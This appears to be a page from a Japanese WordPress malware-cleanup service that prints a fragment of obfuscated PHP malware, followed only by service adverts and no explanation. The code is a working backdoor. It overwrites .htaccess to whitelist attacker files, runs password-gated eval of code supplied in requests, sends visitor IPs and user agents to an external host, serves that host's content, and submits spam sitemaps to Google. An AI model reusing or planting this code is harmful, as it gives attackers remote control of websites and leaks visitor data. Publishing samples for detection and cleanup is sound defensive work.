$O_00__O0OO = 'PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIEFsbG93IGZyb20gYWxsCjwvRmlsZXNNYXRjaD4KPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==';
$O_00__O0OO = @"<FilesMatch \".(py|exe|php)\$\">\n Order allow,deny\n Deny from all\n</FilesMatch>\n<FilesMatch \"^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)\$\">\n Order allow,deny\n Allow from all\n</FilesMatch>\n<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php\$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>";
if (file_exists($O0OO0__O0_)) {
$O0O0_OO__0 = file_get_contents($O0OO0__O0_);
if ($O_00__O0OO == $O0O0_OO__0) {
return;
}
}
@chmod($O0OO0__O0_, 0777);
@file_put_contents($O0OO0__O0_, $O_00__O0OO);
@chmod($O0OO0__O0_, 0644);
}
function O__0_0OOO0($O0_O0OO__0, $OOO00O0___)
{
$O0_O00O__O = 'https://www.google.com/ping?sitemap=%s%s/%s';
$O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0);
$O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00);
if (isset($_REQUEST["st"])) {
var_dump($O0O_O_O_00);
var_dump($O_O00O_O_0);
die;
}
$O0_O_0_OO0 = 'google';
$O0O0O__0O_ = 'success';
$O0_00O_O_O = O__0_O0OO0('S0vMzJVEllSNAQA=');
if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) {
die($O0O0O__0O_);
} else {
$O0_O00O__O = 'http://www.google.com/ping?sitemap=%s%s/%s';
$O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0);
$O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00);
if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) {
die($O0O0O__0O_);
}
die($O0_00O_O_O);
}
}
function O__O_0O0O0($zzz)
{
$O___0OOO00 = tempnam(sys_get_temp_dir(), "z1zz");
$OO0_O__00O = base64_decode(rawurldecode(urlencode(urldecode($zzz))));
$O_0OO0__O0 = "<?php";
if (strpos($OO0_O__00O, $O_0OO0__O0) === false) {
$OO0_O__00O = "<?phpPHP_EOL" . $OO0_O__00O;
}
@file_put_contents($O___0OOO00, $OO0_O__00O);
@(require $O___0OOO00);
@unlink($O___0OOO00);
die;
}
function OO00O0O___($input)
{
$OOO00O0___ = array();
$OOO00O0___["default_params"] = $input;
$OOO00O0___["api"] = 'http://3108-ch4-v4.everyyywell.com';
$OOO00O0___["server_domain"] = O_OO_00_O0();
$OOO00O0___["request_url"] = $_SERVER["REQUEST_URI"];
$OOO00O0___["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$OOO00O0___["user_agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$OOO00O0___["ip"] = O00_0OO_O_();
if (isset($_SERVER["HTTPS"])) {
$OOO00O0___["protocol"] = 'https://';
} else {
$OOO00O0___["protocol"] = 'http://';
}
if (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) {
$OOO00O0___["language"] = $_SERVER["HTTP_ACCEPT_LANGUAGE"];
} else {
$OOO00O0___["language"] = "";
}
if (isset($_REQUEST["params"])) {
$OO0_O_O00_ = 'Content-type:application/json';
header($OO0_O_O00_);
if (function_exists('json_encode')) {
echo json_encode($OOO00O0___);
} else {
print_r($OOO00O0___);
}
die;
}
if (isset($_REQUEST["d_time"])) {
die('2021/9/23');
}
if (isset($_REQUEST["pwd163"])) {
if (md5(trim($_REQUEST["pwd163"])) == "f31cb88a4077528b99d58a83102e883f") {
$OO0_O__00O = base64_decode(rawurldecode(urlencode(urldecode($_REQUEST["zzz"]))));
$O_0OO0__O0 = "<?php";
if (strpos($OO0_O__00O, $O_0OO0__O0) === false) {
$OO0_O__00O = "<?phpPHP_EOL" . $OO0_O__00O;
}
if (isset($_REQUEST["e"])) {
$OO0_O__00O = str_replace($O_0OO0__O0, "", $OO0_O__00O);
eval($OO0_O__00O);
die;
}
$O___0OOO00 = tmpfile();
fwrite($O___0OOO00, $OO0_O__00O);
$O0___O0OO0 = stream_get_meta_data($O___0OOO00);
@(require $O0___O0OO0["uri"]);
fclose($O___0OOO00);
die;
}
if (md5($_REQUEST["pwd163"] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8") {
if (isset($_GET["sitemap"])) {
$O0_O0OO__0 = $_GET["sitemap"];
O__0_0OOO0($O0_O0OO__0, $OOO00O0___);
}
}
}
OOO0__0_O0();
$O_0O_0OO_0 = array('domain' => $OOO00O0___["server_domain"], 'request_url' => $OOO00O0___["request_url"], 'ip' => $OOO00O0___["ip"], 'agent' => $OOO00O0___["user_agent"], 'referer' => $OOO00O0___["referer"], 'protocol' => $OOO00O0___["protocol"], 'language' => $OOO00O0___["language"]);
$O_00__O0OO = OO_O0O_0_0($OOO00O0___["api"], 0, 2, $O_0O_0OO_0, array(), $OOO00O0___["server_domain"]);
if (isset($_REQUEST["dump"])) {
var_dump($O_00__O0OO);
$O_00__O0OO = OO_O0O_0_0("http://google.co.jp");
var_dump($O_00__O0OO);
die;
}
$O00_O_OO0_ = OOO0O_0_0_($O_00__O0OO);
if ($O00_O_OO0_ !== false) {
foreach ($O00_O_OO0_["headers"] as $OO0_O_O00_) {
@header($OO0_O_O00_);
}
echo $O00_O_OO0_["data"];
die;
}
}
// 'http://3108-ch4-v4.everyyywell.com'
OO00O0O___('DatHgRv0YcwDxozvSLyzrMqxYMjDtgmtOYn2Jgi0pLtXFYZ0cLjmlVO2AZxXMJz5ZetXnlB3LZGWGxpsiLSmWNTvSbNQX=U=');■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.